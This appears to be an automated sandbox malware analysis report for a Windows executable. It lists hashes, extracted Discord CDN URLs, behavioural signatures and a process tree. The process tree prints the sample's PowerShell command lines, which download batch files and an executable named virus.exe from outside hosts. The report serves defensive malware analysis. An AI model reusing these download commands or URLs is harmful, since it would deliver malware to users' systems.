Analysis
- max time kernel: 90s
- max time network: 92s
- platform: windows10-2004_x64
- resource: win10v2004-20231215-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 26/01/2024, 11:54
Static task
- static1

Behavioral task
- behavioral1
  Sample: d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe
  Resource: win7-20231215-en

Behavioral task
- behavioral2
  Sample: d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe
  Resource: win10v2004-20231215-en
General
- Target: d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe
- Size: 108KB
- MD5: 5a0002d2a22ceca62c674539b7454ae4
- SHA1: 8aebc5ca26daace2b5cef162500ffe515fc601e1
- SHA256: f240023089aeb390afb771116dcd81d753e1270a573caef7118be24ad3799762
- SHA512: 083792c1e199deaa86fde46b5b788c50a1b8a3b6bed4493d509aaa5d6c75fad4a631e64e0bc717ec13628d7fc3250d92566a12c934e6c04b1ac5452adbe573a7
- SSDEEP: 1536:K7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIflAmOHk1xJ:oq6+ouCpk2mpcWJ0r+QNTBfl9e
Malware Config
Extracted URLs:
- https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3
- https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat
- https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat
- https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat
- https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe
Signatures

Blocklisted process makes network request (10 IoCs)
  flow  pid   Process
  6     1160  powershell.exe
  14    3432  powershell.exe
  18    5000  powershell.exe
  20    4092  powershell.exe
  21    5016  powershell.exe
  22    4344  powershell.exe
  32    4608  powershell.exe
  33    3432  powershell.exe
  34    4316  powershell.exe
  35    4964  powershell.exe

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                Process
  Key value queried  \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation  d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (25 IoCs)
  pid   Process
  1160  powershell.exe
  1160  powershell.exe
  3432  powershell.exe
  3432  powershell.exe
  5000  powershell.exe
  5000  powershell.exe
  4092  powershell.exe
  4092  powershell.exe
  5016  powershell.exe
  5016  powershell.exe
  4344  powershell.exe
  4344  powershell.exe
  4344  powershell.exe
  4608  powershell.exe
  4608  powershell.exe
  4608  powershell.exe
  3432  powershell.exe
  3432  powershell.exe
  3432  powershell.exe
  4316  powershell.exe
  4316  powershell.exe
  4316  powershell.exe
  4964  powershell.exe
  4964  powershell.exe
  4964  powershell.exe

Suspicious use of AdjustPrivilegeToken (10 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  1160  powershell.exe
  Token: SeDebugPrivilege  3432  powershell.exe
  Token: SeDebugPrivilege  5000  powershell.exe
  Token: SeDebugPrivilege  4092  powershell.exe
  Token: SeDebugPrivilege  5016  powershell.exe
  Token: SeDebugPrivilege  4344  powershell.exe
  Token: SeDebugPrivilege  4608  powershell.exe
  Token: SeDebugPrivilege  3432  powershell.exe
  Token: SeDebugPrivilege  4316  powershell.exe
  Token: SeDebugPrivilege  4964  powershell.exe

Suspicious use of WriteProcessMemory (22 IoCs)
  description                        pid   Process                                                                  procid_target
  PID 3412 wrote to memory of 208    3412  d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe  86
  PID 3412 wrote to memory of 208    3412  d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe  86
  PID 208 wrote to memory of 1160    208   cmd.exe                                                                  91
  PID 208 wrote to memory of 1160    208   cmd.exe                                                                  91
  PID 208 wrote to memory of 3432    208   cmd.exe                                                                  105
  PID 208 wrote to memory of 3432    208   cmd.exe                                                                  105
  PID 208 wrote to memory of 5000    208   cmd.exe                                                                  93
  PID 208 wrote to memory of 5000    208   cmd.exe                                                                  93
  PID 208 wrote to memory of 4092    208   cmd.exe                                                                  96
  PID 208 wrote to memory of 4092    208   cmd.exe                                                                  96
  PID 208 wrote to memory of 5016    208   cmd.exe                                                                  99
  PID 208 wrote to memory of 5016    208   cmd.exe                                                                  99
  PID 208 wrote to memory of 4344    208   cmd.exe                                                                  101
  PID 208 wrote to memory of 4344    208   cmd.exe                                                                  101
  PID 208 wrote to memory of 4608    208   cmd.exe                                                                  104
  PID 208 wrote to memory of 4608    208   cmd.exe                                                                  104
  PID 208 wrote to memory of 3432    208   cmd.exe                                                                  105
  PID 208 wrote to memory of 3432    208   cmd.exe                                                                  105
  PID 208 wrote to memory of 4316    208   cmd.exe                                                                  106
  PID 208 wrote to memory of 4316    208   cmd.exe                                                                  106
  PID 208 wrote to memory of 4964    208   cmd.exe                                                                  107
  PID 208 wrote to memory of 4964    208   cmd.exe                                                                  107
Processes

Process (depth 1): C:\Users\Admin\AppData\Local\Temp\d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 3412

  Process (depth 2): C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4CD8.tmp\4CD9.tmp\4CDA.bat C:\Users\Admin\AppData\Local\Temp\d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe"
    - Suspicious use of WriteProcessMemory
    PID: 208

    Process (depth 3): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3', 'pixel_sides_very_good.mp3')"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1160

    Process (depth 3): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3 -OutFile pixel_sides_very_good.mp3"
      PID: 3432

    Process (depth 3): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat', 'music.bat')"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 5000

    Process (depth 3): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat -OutFile music.bat"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 4092

    Process (depth 3): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat', 'no.bat')"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 5016

    Process (depth 3): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat -OutFile no.bat"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 4344

    Process (depth 3): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat', 'DO2.bat')"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 4608

    Process (depth 3): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat -OutFile DO2.bat"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 3432

    Process (depth 3): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe', 'VIRUS.exe')"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 4316

    Process (depth 3): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe -OutFile VIRUS.exe"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 4964
Network
MITRE ATT&CK Enterprise v15
Downloads